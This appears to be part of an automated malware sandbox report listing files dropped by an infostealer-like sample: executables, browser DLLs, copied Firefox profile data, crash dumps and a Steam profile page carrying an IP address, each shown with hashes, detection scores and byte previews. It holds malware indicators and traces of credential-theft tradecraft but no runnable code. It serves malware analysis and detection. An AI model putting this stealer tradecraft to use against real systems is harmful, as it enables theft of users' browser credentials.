Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCFBFHIEBKJ\JEBKKE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10237
Entropy (8bit):	5.498288591230544
Encrypted:	false
SSDEEP:	192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
MD5:	0F58C61DE9618A1B53735181E43EE166
SHA1:	CC45931CF12AF92935A84C2A015786CC810AEC3A
SHA-256:	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
SHA-512:	DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KFCFBFHIEBKJ\KJDAEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D02.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Jul 26 10:58:02 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	109918
Entropy (8bit):	2.2642185939551047
Encrypted:	false
SSDEEP:	384:xBuldv0WqElDW7RNZH43BC27E3U3dDPcFwrS4V+r6yqmVJvdiL:xkldv0WqElDW7RoCZ+oea6yn0
MD5:	7A3BB6B97655CA29774B83AEECA26222
SHA1:	926401D9B0C78A58ABBFD582763100DBBAD61B53
SHA-256:	FC345E8978796D671E91B8FF9070391F1A1D771DEB3E81513DD935EA9C006D7E
SHA-512:	8506E64872A8FFE06E7087A40D8900CA18977F05F2DDA85D5CF56C09D621EF1276D86D1DF3464F9A8B95C52DC294AFCC64EC2C24033B5C8E7E85CE36ABE0B658
Malicious:	false
Preview:	MDMP..a..... .......:..f............4...........4*..H.......<...\|1...........E..........`.......8...........T............{..f1...........1...........3..............................................................................eJ......<4......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71C5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8494
Entropy (8bit):	3.6999310130913186
Encrypted:	false
SSDEEP:	192:R6l7wVeJJk6+Jwe6YRT6s54ugmfkJZRepD/89bb7sfzpm:R6lXJ6626YV6s54ugmfkJZRzbAfQ
MD5:	F569DEE5A7412EB6EC08E87CA2C5A33F
SHA1:	2D58DA2DAC694F45447F507FA9B59A12EC0DC617
SHA-256:	A9BC797C3AFC0401B9E13D20AB0F119B0D6EF7AB19B196AF26EE76FBF64604C2
SHA-512:	D7C89796A79303A6A8E74245C4A4D653075E3AE340C16568D6B9D54F17D42F89BC48A22F63C95FDEF92514AFDF8C13935EFA0CC2B4D3B77441B693C13104C28A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7224.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4788
Entropy (8bit):	4.507936022136065
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHJg77aI95zyWpW8VYqYm8M4JCOO3Frnl+q8vvOOIq53Rd:uIjfpI7P/7VmJRulKmjm3Rd
MD5:	0941B1DF82600DB6A2595E2082E4369D
SHA1:	C704A1709358492745F69DEAD1293B8BEE302666
SHA-256:	493F79C1DC667884C81D540833F511292C1F736B9705CDCF58BE727B55E353DB
SHA-512:	0C6466895EA6ED333EF19DDFCDCF6FBEAE8BEC1F1DFBDF21BFB737CC394C56CCD4329441B3BDB25ED2BC28840D89D1283626D5639EB910989943B0402D862FC7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427800" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Bootstrapper.exe, Detection: malicious, Browse Filename: azeyNF3kkf.exe, Detection: malicious, Browse Filename: Setup .exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Bootstrapper.exe, Detection: malicious, Browse Filename: azeyNF3kkf.exe, Detection: malicious, Browse Filename: Setup .exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\76561199747278259[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.3992869569358275
Encrypted:	false
SSDEEP:	768:/dpqm+0Ih3tAA9CWGVGfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2/:/d8m+0Ih3tAA9CWGVGFJTBv++nIjBtPz
MD5:	D660743EB9BD8320F998319AED93B13E
SHA1:	454B88A862A4EF03CD56693D6819BB3CD498D9D8
SHA-256:	09A30008B8AC68EF5EF98447248DFD4EE8075AE9E7026C4F7C43261EF358426D
SHA-512:	A4F3F2582264AE0F6B2C6E3186D464C17D80D356EF922699C4C2AA339AD78C3E2E2AF2DB02447493AE6CBC84EC60AB4F66DE97E57D27C5CCF1F53D4E2898E085
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://5.75.212.60\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\7847438767[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	12016128
Entropy (8bit):	6.075183250085094
Encrypted:	false
SSDEEP:	49152:h3FUhq8uEA5Cu+Ng9hxWpZdESPzNHk8aPu9ipJY0/CcjaChdReYEk8fSj+TBmkOv://CvGkk+8qc8On18iiDoA1PdxGdQI
MD5:	190E4ED7759276E78D16398673996B2B
SHA1:	CE5BB936AB809356D5B0BC29B6BE2E0D07D3DC0A
SHA-256:	D4E965DEAAAA9D84359FBCE89A2CB1966BCA6BF525DF8BBFB1AD9ED08DF1DAAD
SHA-512:	99CF79ABA0AFC528341C3EF474BA4AB71E50FAF497536E74F8D985C39E85D5E145FB86262BAC3E95E4C7752C3C0294751D4A988C2F4FBE5BCFCD3C6D19EF9C70
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....r.f.........."..........+..............@.....................................................@............... ...............`.......`.."P.............................................................(....................t...............................text...0.......................... ..`.data....}.......~.................@....bss....,....`...........................idata.."P...`...R...D..............@....didata.............................@....edata.......`.......(..............@..@.tls.........p...........................rdata..m............*..............@..@.reloc...............,..............@..B.pdata..............................@..@.rsrc...............v..............@..@....................Z..............@..@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\server[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2711040
Entropy (8bit):	6.699494465322305
Encrypted:	false
SSDEEP:	49152:KoW7eYGTL2twElWv+qXy3wfENRxOgB03gStRTvgl6xhp8IbCcNy+OHDLjzs/DOrD:m7e6KVdx1Rquh
MD5:	BF9ACB6E48B25A64D9061B86260CA0B6
SHA1:	933EE238EF2B9CD33FAB812964B63DA02283AE40
SHA-256:	02A8C111FD1BB77B7483DC58225B2A2836B58CDAF9FC903F2F2C88A57066CBC0
SHA-512:	AC17E6D73922121C1F7C037D1FC30E1367072FDF7D95AF344E713274825A03FC90107E024E06FCCDA21675EE82A2BCCAD0AE117E55E2B9294D1A0C5056A2031D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... P.f...............$..'..Z)..`.............@.............................00.....qE*...`... .............................................../.......0.8.....(..L........... 0............................. .(.(...................X./..............................text.....'.......'.................`..`.data........ '.......'.............@....rdata........(.......'.............@..@.pdata...L....(..N....(.............@..@.xdata...A...0)..B....).............@..@.bss.....^....)..........................idata......../......N).............@....CRT....X...../......T).............@....tls..........0......V).............@....rsrc...8.....0......X).............@..@.reloc....... 0......Z).............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\build_2024-07-25_20-56[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356864
Entropy (8bit):	4.7764157519415775
Encrypted:	false
SSDEEP:	3072:oh2eRgJtqxVRGKf8OGiLOnXChCrmqSOLMKTJGlRayuEpZTPckmRmVfL:URRgJtqpGO8OUnrpbMKT0lXZT3p
MD5:	BEA49EAB907AF8AD2CBEA9BFB807AAE2
SHA1:	8EFEC66E57E052D6392C5CBB7667D1B49E88116E
SHA-256:	9B645F570116D3E10FAA316981E4FCDE6FE55417FECED3385CFBB815C7DF8707
SHA-512:	59486E18BE6B85F5275C19F963D124F4F74C265B5B6DFA78C52F9243E444F40A7747A741CCB59BF1863FFB497321324C803FC967380900A6A2E0219EB99F387C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..K............`.y.....`.L.....`.x.P.....A.........\|...`.}.....`.H.....`.O.....Rich............................PE..L....I>e..........................................@.................................-...........................................d...................................................................p...@............................................text.............................. ..`.rdata...1.......2..................@..@.data...l...........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000019001\server.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2711040
Entropy (8bit):	6.699494465322305
Encrypted:	false
SSDEEP:	49152:KoW7eYGTL2twElWv+qXy3wfENRxOgB03gStRTvgl6xhp8IbCcNy+OHDLjzs/DOrD:m7e6KVdx1Rquh
MD5:	BF9ACB6E48B25A64D9061B86260CA0B6
SHA1:	933EE238EF2B9CD33FAB812964B63DA02283AE40
SHA-256:	02A8C111FD1BB77B7483DC58225B2A2836B58CDAF9FC903F2F2C88A57066CBC0
SHA-512:	AC17E6D73922121C1F7C037D1FC30E1367072FDF7D95AF344E713274825A03FC90107E024E06FCCDA21675EE82A2BCCAD0AE117E55E2B9294D1A0C5056A2031D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... P.f...............$..'..Z)..`.............@.............................00.....qE*...`... .............................................../.......0.8.....(..L........... 0............................. .(.(...................X./..............................text.....'.......'.................`..`.data........ '.......'.............@....rdata........(.......'.............@..@.pdata...L....(..N....(.............@..@.xdata...A...0)..B....).............@..@.bss.....^....)..........................idata......../......N).............@....CRT....X...../......T).............@....tls..........0......V).............@....rsrc...8.....0......X).............@..@.reloc....... 0......Z).............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356864
Entropy (8bit):	4.7764157519415775
Encrypted:	false
SSDEEP:	3072:oh2eRgJtqxVRGKf8OGiLOnXChCrmqSOLMKTJGlRayuEpZTPckmRmVfL:URRgJtqpGO8OUnrpbMKT0lXZT3p
MD5:	BEA49EAB907AF8AD2CBEA9BFB807AAE2
SHA1:	8EFEC66E57E052D6392C5CBB7667D1B49E88116E
SHA-256:	9B645F570116D3E10FAA316981E4FCDE6FE55417FECED3385CFBB815C7DF8707
SHA-512:	59486E18BE6B85F5275C19F963D124F4F74C265B5B6DFA78C52F9243E444F40A7747A741CCB59BF1863FFB497321324C803FC967380900A6A2E0219EB99F387C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..K............`.y.....`.L.....`.x.P.....A.........\|...`.}.....`.H.....`.O.....Rich............................PE..L....I>e..........................................@.................................-...........................................d...................................................................p...@............................................text.............................. ..`.rdata...1.......2..................@..@.data...l...........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\IRqsWvBBMc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1947648
Entropy (8bit):	7.95154004137865
Encrypted:	false
SSDEEP:	49152:3NuQyW519T77T9gssw0Z7kiEfK45vQHOG/dW:3k90l39gd7kiUK4pQHOk
MD5:	78343EFCB6F731CD7668E648ED73E40F
SHA1:	7D7D8FF1AA08A1E4BFC766EC8A59576DE2E49E99
SHA-256:	F0CCA8A13C6F8D768FB49EFC17A0181CDE1C28F9AFB0BE916B441BCDF75194AE
SHA-512:	B1AC74C99B8ADC1782C869849E05046410F4B7CDB395A9752F46D07A00FC6B94D767D50C0DF971EB99A3E138D9AE14619EC17BBCBCEAE44A8DFBD5C32CAE102D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................@M...........@..........................pM...........@.................................W...k...........................xM.............................(M..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...erhqbccx......2.....................@...uokpdgqw.....0M.....................@....taggant.0...@M.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\IRqsWvBBMc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
